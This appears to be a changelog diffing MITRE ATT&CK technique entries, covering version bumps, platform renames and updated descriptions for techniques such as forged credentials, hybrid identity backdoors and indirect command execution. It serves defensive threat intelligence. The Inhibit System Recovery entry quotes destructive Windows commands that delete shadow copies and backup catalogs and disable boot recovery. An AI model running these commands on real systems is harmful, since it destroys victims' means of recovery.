x_mitre_platforms | Google Workspace | |
[T1606] Forge Web Credentials
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-10-15 11:10:03.428000+00:00 | 2024-10-15 15:58:23.638000+00:00 |
external_references[3]['description'] | Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. Retrieved December 16, 2020. | Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. Retrieved September 27, 2024. |
external_references[3]['url'] | https://github.com/damianh/aws-adfs-credential-generator | https://github.com/pvanbuijtene/aws-adfs-credential-generator |
x_mitre_version | 1.4 | 1.5 |
x_mitre_platforms[5] | Office 365 | Office Suite |
x_mitre_platforms[6] | Google Workspace | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
[T1592] Gather Victim Host Information
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
t | Adversaries may gather information about the victim's hosts | t | Adversaries may gather information about the victim's hosts |
| that can be used during targeting. Information about hosts m | | that can be used during targeting. Information about hosts m |
| ay include a variety of details, including administrative da | | ay include a variety of details, including administrative da |
| ta (ex: name, assigned IP, functionality, etc.) as well as s | | ta (ex: name, assigned IP, functionality, etc.) as well as s |
| pecifics regarding its configuration (ex: operating system, | | pecifics regarding its configuration (ex: operating system, |
| language, etc.). Adversaries may gather this information in | | language, etc.). Adversaries may gather this information in |
| various ways, such as direct collection actions via [Active | | various ways, such as direct collection actions via [Active |
| Scanning](https://attack.mitre.org/techniques/T1595) or [Ph | | Scanning](https://attack.mitre.org/techniques/T1595) or [Ph |
| ishing for Information](https://attack.mitre.org/techniques/ | | ishing for Information](https://attack.mitre.org/techniques/ |
| T1598). Adversaries may also compromise sites then include m | | T1598). Adversaries may also compromise sites then include m |
| alicious content designed to collect host information from v | | alicious content designed to collect host information from v |
| isitors.(Citation: ATT ScanBox) Information about hosts may | | isitors.(Citation: ATT ScanBox) Information about hosts may |
| also be exposed to adversaries via online or other accessibl | | also be exposed to adversaries via online or other accessibl |
| e data sets (ex: [Social Media](https://attack.mitre.org/tec | | e data sets (ex: [Social Media](https://attack.mitre.org/tec |
| hniques/T1593/001) or [Search Victim-Owned Websites](https:/ | | hniques/T1593/001) or [Search Victim-Owned Websites](https:/ |
| /attack.mitre.org/techniques/T1594)). Gathering this informa | | /attack.mitre.org/techniques/T1594)). Gathering this informa |
| tion may reveal opportunities for other forms of reconnaissa | | tion may reveal opportunities for other forms of reconnaissa |
| nce (ex: [Search Open Websites/Domains](https://attack.mitre | | nce (ex: [Search Open Websites/Domains](https://attack.mitre |
| .org/techniques/T1593) or [Search Open Technical Databases]( | | .org/techniques/T1593) or [Search Open Technical Databases]( |
| https://attack.mitre.org/techniques/T1596)), establishing op | | https://attack.mitre.org/techniques/T1596)), establishing op |
| erational resources (ex: [Develop Capabilities](https://atta | | erational resources (ex: [Develop Capabilities](https://atta |
| ck.mitre.org/techniques/T1587) or [Obtain Capabilities](http | | ck.mitre.org/techniques/T1587) or [Obtain Capabilities](http |
| s://attack.mitre.org/techniques/T1588)), and/or initial acce | | s://attack.mitre.org/techniques/T1588)), and/or initial acce |
| ss (ex: [Supply Chain Compromise](https://attack.mitre.org/t | | ss (ex: [Supply Chain Compromise](https://attack.mitre.org/t |
| echniques/T1195) or [External Remote Services](https://attac | | echniques/T1195) or [External Remote Services](https://attac |
| k.mitre.org/techniques/T1133)). | | k.mitre.org/techniques/T1133)). Adversaries may also gather |
| | | victim host information via User-Agent HTTP headers, which |
| | | are sent to a server to identify the application, operating |
| | | system, vendor, and/or version of the requesting user agent. |
| | | This can be used to inform the adversary’s follow-on action |
| | | . For example, adversaries may check user agents for the req |
| | | uesting operating system, then only serve malware for target |
| | | operating systems while ignoring others.(Citation: TrellixQ |
| | | akbot) |
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_contributors | | ['Sam Seabrook, Duke Energy'] |
x_mitre_deprecated | | False |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-10-17 16:35:09.878000+00:00 | 2024-10-03 19:35:07.269000+00:00 |
description | Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). | Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot) |
x_mitre_version | 1.1 | 1.2 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'TrellixQakbot', 'description': 'Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware Distribution. Retrieved August 1, 2024.', 'url': 'https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/'} |
[T1552.006] Unsecured Credentials: Group Policy Preferences
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-06-17 14:25:38.082000+00:00 | 2024-08-15 13:21:22.734000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1564] Hide Artifacts
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-03-29 17:45:48.126000+00:00 | 2024-10-15 15:58:49.815000+00:00 |
x_mitre_version | 1.2 | 1.3 |
x_mitre_platforms[3] | Office 365 | Office Suite |
[T1556.007] Modify Authentication Process: Hybrid Identity
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
t | Adversaries may patch, modify, or otherwise backdoor cloud a | t | Adversaries may patch, modify, or otherwise backdoor cloud a |
| uthentication processes that are tied to on-premises user id | | uthentication processes that are tied to on-premises user id |
| entities in order to bypass typical authentication mechanism | | entities in order to bypass typical authentication mechanism |
| s, access credentials, and enable persistent access to accou | | s, access credentials, and enable persistent access to accou |
| nts. Many organizations maintain hybrid user and device i | | nts. Many organizations maintain hybrid user and device i |
| dentities that are shared between on-premises and cloud-base | | dentities that are shared between on-premises and cloud-base |
| d environments. These can be maintained in a number of ways. | | d environments. These can be maintained in a number of ways. |
| For example, Azure AD includes three options for synchroniz | | For example, Microsoft Entra ID includes three options for |
| ing identities between Active Directory and Azure AD(Citatio | | synchronizing identities between Active Directory and Entra |
| n: Azure AD Hybrid Identity): * Password Hash Synchronizati | | ID(Citation: Azure AD Hybrid Identity): * Password Hash Syn |
| on (PHS), in which a privileged on-premises account synchron | | chronization (PHS), in which a privileged on-premises accoun |
| izes user password hashes between Active Directory and Azure | | t synchronizes user password hashes between Active Directory |
| AD, allowing authentication to Azure AD to take place entir | | and Entra ID, allowing authentication to Entra ID to take p |
| ely in the cloud * Pass Through Authentication (PTA), in wh | | lace entirely in the cloud * Pass Through Authentication (P |
| ich Azure AD authentication attempts are forwarded to an on- | | TA), in which Entra ID authentication attempts are forwarded |
| premises PTA agent, which validates the credentials against | | to an on-premises PTA agent, which validates the credential |
| Active Directory * Active Directory Federation Services (AD | | s against Active Directory * Active Directory Federation Se |
| FS), in which a trust relationship is established between A | | rvices (AD FS), in which a trust relationship is established |
| ctive Directory and Azure AD AD FS can also be used with o | | between Active Directory and Entra ID AD FS can also be u |
| ther SaaS and cloud platforms such as AWS and GCP, which wil | | sed with other SaaS and cloud platforms such as AWS and GCP, |
| l hand off the authentication process to AD FS and receive a | | which will hand off the authentication process to AD FS and |
| token containing the hybrid users’ identity and privileges. | | receive a token containing the hybrid users’ identity and p |
| By modifying authentication processes tied to hybrid iden | | rivileges. By modifying authentication processes tied to h |
| tities, an adversary may be able to establish persistent pri | | ybrid identities, an adversary may be able to establish pers |
| vileged access to cloud resources. For example, adversaries | | istent privileged access to cloud resources. For example, ad |
| who compromise an on-premises server running a PTA agent may | | versaries who compromise an on-premises server running a PTA |
| inject a malicious DLL into the `AzureADConnectAuthenticati | | agent may inject a malicious DLL into the `AzureADConnectAu |
| onAgentService` process that authorizes all attempts to auth | | thenticationAgentService` process that authorizes all attemp |
| enticate to Azure AD, as well as records user credentials.(C | | ts to authenticate to Entra ID, as well as records user cred |
| itation: Azure AD Connect for Read Teamers)(Citation: AADInt | | entials.(Citation: Azure AD Connect for Read Teamers)(Citati |
| ernals Azure AD On-Prem to Cloud) In environments using AD F | | on: AADInternals Azure AD On-Prem to Cloud) In environments |
| S, an adversary may edit the `Microsoft.IdentityServer.Servi | | using AD FS, an adversary may edit the `Microsoft.IdentitySe |
| cehost` configuration file to load a malicious DLL that gene | | rver.Servicehost` configuration file to load a malicious DLL |
| rates authentication tokens for any user with any set of cla | | that generates authentication tokens for any user with any |
| ims, thereby bypassing multi-factor authentication and defin | | set of claims, thereby bypassing multi-factor authentication |
| ed AD FS policies.(Citation: MagicWeb) In some cases, adver | | and defined AD FS policies.(Citation: MagicWeb) In some ca |
| saries may be able to modify the hybrid identity authenticat | | ses, adversaries may be able to modify the hybrid identity a |
| ion process from the cloud. For example, adversaries who com | | uthentication process from the cloud. For example, adversari |
| promise a Global Administrator account in an Azure AD tenant | | es who compromise a Global Administrator account in an Entra |
| may be able to register a new PTA agent via the web console | | ID tenant may be able to register a new PTA agent via the w |
| , similarly allowing them to harvest credentials and log int | | eb console, similarly allowing them to harvest credentials a |
| o the Azure AD environment as any user.(Citation: Mandiant A | | nd log into the Entra ID environment as any user.(Citation: |
| zure AD Backdoors) | | Mandiant Azure AD Backdoors) |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-21 16:09:38.202000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
description | Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.
Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD(Citation: Azure AD Hybrid Identity):
* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud
* Pass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory
* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD
AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges.
By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)
In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.(Citation: Mandiant Azure AD Backdoors) | Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.
Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Microsoft Entra ID includes three options for synchronizing identities between Active Directory and Entra ID(Citation: Azure AD Hybrid Identity):
* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Entra ID, allowing authentication to Entra ID to take place entirely in the cloud
* Pass Through Authentication (PTA), in which Entra ID authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory
* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Entra ID
AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges.
By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Entra ID, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)
In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Entra ID tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Entra ID environment as any user.(Citation: Mandiant Azure AD Backdoors) |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[4] | Office 365 | Identity Provider |
x_mitre_platforms[3] | Google Workspace | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
[T1562] Impair Defenses
Current version: 1.6
Version changed from: 1.5 → 1.6
|
|
t | Adversaries may maliciously modify components of a victim en | t | Adversaries may maliciously modify components of a victim en |
| vironment in order to hinder or disable defensive mechanisms | | vironment in order to hinder or disable defensive mechanisms |
| . This not only involves impairing preventative defenses, su | | . This not only involves impairing preventative defenses, su |
| ch as firewalls and anti-virus, but also detection capabilit | | ch as firewalls and anti-virus, but also detection capabilit |
| ies that defenders can use to audit activity and identify ma | | ies that defenders can use to audit activity and identify ma |
| licious behavior. This may also span both native defenses as | | licious behavior. This may also span both native defenses as |
| well as supplemental capabilities installed by users and ad | | well as supplemental capabilities installed by users and ad |
| ministrators. Adversaries may also impair routine operation | | ministrators. Adversaries may also impair routine operation |
| s that contribute to defensive hygiene, such as blocking use | | s that contribute to defensive hygiene, such as blocking use |
| rs from logging out of a computer or stopping it from being | | rs from logging out, preventing a system from shutting down, |
| shut down. These restrictions can further enable malicious o | | or disabling or modifying the update process. Adversaries c |
| perations as well as the continued propagation of incidents. | | ould also target event aggregation and analysis mechanisms, |
| (Citation: Emotet shutdown) Adversaries could also target e | | or otherwise disrupt these procedures by altering other syst |
| vent aggregation and analysis mechanisms, or otherwise disru | | em components. These restrictions can further enable malicio |
| pt these procedures by altering other system components. | | us operations as well as the continued propagation of incide |
| | | nts.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: |
| | | Emotet shutdown) |
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | ['Jamie Williams (U ω U), PANW Unit 42', 'Liran Ravich, CardinalOps'] |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-10-20 16:43:53.391000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
description | Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. | Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
|
x_mitre_version | 1.5 | 1.6 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Google Cloud Mandiant UNC3886 2024', 'description': ' Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert: Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations'} |
x_mitre_platforms | | Identity Provider |
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
[T1656] Impersonation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-09-30 19:45:05.886000+00:00 | 2024-10-15 15:59:06.382000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1070] Indicator Removal
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-11 22:27:54.003000+00:00 | 2024-10-15 15:59:22.125000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 2.1 | 2.2 |
x_mitre_platforms[5] | Office 365 | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Google Workspace | |
[T1202] Indirect Command Execution
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
t | Adversaries may abuse utilities that allow for command execu | t | Adversaries may abuse utilities that allow for command execu |
| tion to bypass security restrictions that limit the use of c | | tion to bypass security restrictions that limit the use of c |
| ommand-line interpreters. Various Windows utilities may be u | | ommand-line interpreters. Various Windows utilities may be u |
| sed to execute commands, possibly without invoking [cmd](htt | | sed to execute commands, possibly without invoking [cmd](htt |
| ps://attack.mitre.org/software/S0106). For example, [Forfile | | ps://attack.mitre.org/software/S0106). For example, [Forfile |
| s](https://attack.mitre.org/software/S0193), the Program Com | | s](https://attack.mitre.org/software/S0193), the Program Com |
| patibility Assistant (pcalua.exe), components of the Windows | | patibility Assistant (pcalua.exe), components of the Windows |
| Subsystem for Linux (WSL), as well as other utilities may i | | Subsystem for Linux (WSL), Scriptrunner.exe, as well as oth |
| nvoke the execution of programs and commands from a [Command | | er utilities may invoke the execution of programs and comman |
| and Scripting Interpreter](https://attack.mitre.org/techniq | | ds from a [Command and Scripting Interpreter](https://attack |
| ues/T1059), Run window, or via scripts. (Citation: VectorSec | | .mitre.org/techniques/T1059), Run window, or via scripts.(Ci |
| ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017) Ad | | tation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfil |
| versaries may abuse these features for [Defense Evasion](htt | | es Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citat |
| ps://attack.mitre.org/tactics/TA0005), specifically to perfo | | ion: SS64)(Citation: Bleeping Computer - Scriptrunner.exe) |
| rm arbitrary execution while subverting detections and/or mi | | Adversaries may abuse these features for [Defense Evasion](h |
| tigation controls (such as Group Policy) that limit/prevent | | ttps://attack.mitre.org/tactics/TA0005), specifically to per |
| the usage of [cmd](https://attack.mitre.org/software/S0106) | | form arbitrary execution while subverting detections and/or |
| or file extensions more commonly associated with malicious p | | mitigation controls (such as Group Policy) that limit/preven |
| ayloads. | | t the usage of [cmd](https://attack.mitre.org/software/S0106 |
| | | ) or file extensions more commonly associated with malicious |
| | | payloads. |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-05-05 05:06:38.938000+00:00 | 2024-10-03 14:47:17.154000+00:00 |
description | Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads. | Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads. |
external_references[1]['description'] | Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved January 22, 2018. | Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved September 12, 2024. |
external_references[1]['url'] | https://twitter.com/Evi1cg/status/935027922397573120 | https://x.com/Evi1cg/status/935027922397573120 |
external_references[3]['description'] | vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved January 22, 2018. | vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved September 12, 2024. |
external_references[3]['url'] | https://twitter.com/vector_sec/status/896049052642533376 | https://x.com/vector_sec/status/896049052642533376 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Bleeping Computer - Scriptrunner.exe', 'description': 'Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting tool to deploy malware. Retrieved July 8, 2024.', 'url': 'https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/'} |
external_references | | {'source_name': 'Secure Team - Scriptrunner.exe', 'description': 'Secure Team - Information Assurance. (2023, January 8). Windows Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.', 'url': 'https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/'} |
external_references | | {'source_name': 'SS64', 'description': 'SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.', 'url': 'https://ss64.com/nt/scriptrunner.html'} |
x_mitre_contributors | | Liran Ravich, CardinalOps |
[T1490] Inhibit System Recovery
Current version: 1.5
Version changed from: 1.4 → 1.5
|
|
t | Adversaries may delete or remove built-in data and turn off | t | Adversaries may delete or remove built-in data and turn off |
| services designed to aid in the recovery of a corrupted syst | | services designed to aid in the recovery of a corrupted syst |
| em to prevent recovery.(Citation: Talos Olympic Destroyer 20 | | em to prevent recovery.(Citation: Talos Olympic Destroyer 20 |
| 18)(Citation: FireEye WannaCry 2017) This may deny access to | | 18)(Citation: FireEye WannaCry 2017) This may deny access to |
| available backups and recovery options. Operating systems | | available backups and recovery options. Operating systems |
| may contain features that can help fix corrupted systems, su | | may contain features that can help fix corrupted systems, su |
| ch as a backup catalog, volume shadow copies, and automatic | | ch as a backup catalog, volume shadow copies, and automatic |
| repair features. Adversaries may disable or delete system re | | repair features. Adversaries may disable or delete system re |
| covery features to augment the effects of [Data Destruction] | | covery features to augment the effects of [Data Destruction] |
| (https://attack.mitre.org/techniques/T1485) and [Data Encryp | | (https://attack.mitre.org/techniques/T1485) and [Data Encryp |
| ted for Impact](https://attack.mitre.org/techniques/T1486).( | | ted for Impact](https://attack.mitre.org/techniques/T1486).( |
| Citation: Talos Olympic Destroyer 2018)(Citation: FireEye Wa | | Citation: Talos Olympic Destroyer 2018)(Citation: FireEye Wa |
| nnaCry 2017) Furthermore, adversaries may disable recovery n | | nnaCry 2017) Furthermore, adversaries may disable recovery n |
| otifications, then corrupt backups.(Citation: disable_notif_ | | otifications, then corrupt backups.(Citation: disable_notif_ |
| synology_ransom) A number of native Windows utilities have | | synology_ransom) A number of native Windows utilities have |
| been used by adversaries to disable or delete system recover | | been used by adversaries to disable or delete system recover |
| y features: * <code>vssadmin.exe</code> can be used to dele | | y features: * <code>vssadmin.exe</code> can be used to dele |
| te all volume shadow copies on a system - <code>vssadmin.exe | | te all volume shadow copies on a system - <code>vssadmin.exe |
| delete shadows /all /quiet</code> * [Windows Management Ins | | delete shadows /all /quiet</code> * [Windows Management Ins |
| trumentation](https://attack.mitre.org/techniques/T1047) can | | trumentation](https://attack.mitre.org/techniques/T1047) can |
| be used to delete volume shadow copies - <code>wmic shadowc | | be used to delete volume shadow copies - <code>wmic shadowc |
| opy delete</code> * <code>wbadmin.exe</code> can be used to | | opy delete</code> * <code>wbadmin.exe</code> can be used to |
| delete the Windows Backup Catalog - <code>wbadmin.exe delete | | delete the Windows Backup Catalog - <code>wbadmin.exe delete |
| catalog -quiet</code> * <code>bcdedit.exe</code> can be use | | catalog -quiet</code> * <code>bcdedit.exe</code> can be use |
| d to disable automatic Windows recovery features by modifyin | | d to disable automatic Windows recovery features by modifyin |
| g boot configuration data - <code>bcdedit.exe /set {default} | | g boot configuration data - <code>bcdedit.exe /set {default} |
| bootstatuspolicy ignoreallfailures & bcdedit /set {default} | | bootstatuspolicy ignoreallfailures & bcdedit /set {default} |
| recoveryenabled no</code> * <code>REAgentC.exe</code> can b | | recoveryenabled no</code> * <code>REAgentC.exe</code> can b |
| e used to disable Windows Recovery Environment (WinRE) repai | | e used to disable Windows Recovery Environment (WinRE) repai |
| r/recovery options of an infected system * <code>diskshadow. | | r/recovery options of an infected system * <code>diskshadow. |
| exe</code> can be used to delete all volume shadow copies on | | exe</code> can be used to delete all volume shadow copies on |
| a system - <code>diskshadow delete shadows all</code> (Cita | | a system - <code>diskshadow delete shadows all</code> (Cita |
| tion: Diskshadow) (Citation: Crytox Ransomware) On network | | tion: Diskshadow) (Citation: Crytox Ransomware) On network |
| devices, adversaries may leverage [Disk Wipe](https://attack | | devices, adversaries may leverage [Disk Wipe](https://attack |
| .mitre.org/techniques/T1561) to delete backup firmware image | | .mitre.org/techniques/T1561) to delete backup firmware image |
| s and reformat the file system, then [System Shutdown/Reboot | | s and reformat the file system, then [System Shutdown/Reboot |
| ](https://attack.mitre.org/techniques/T1529) to reload the d | | ](https://attack.mitre.org/techniques/T1529) to reload the d |
| evice. Together this activity may leave network devices comp | | evice. Together this activity may leave network devices comp |
| letely inoperable and inhibit recovery operations. Adversar | | letely inoperable and inhibit recovery operations. Adversar |
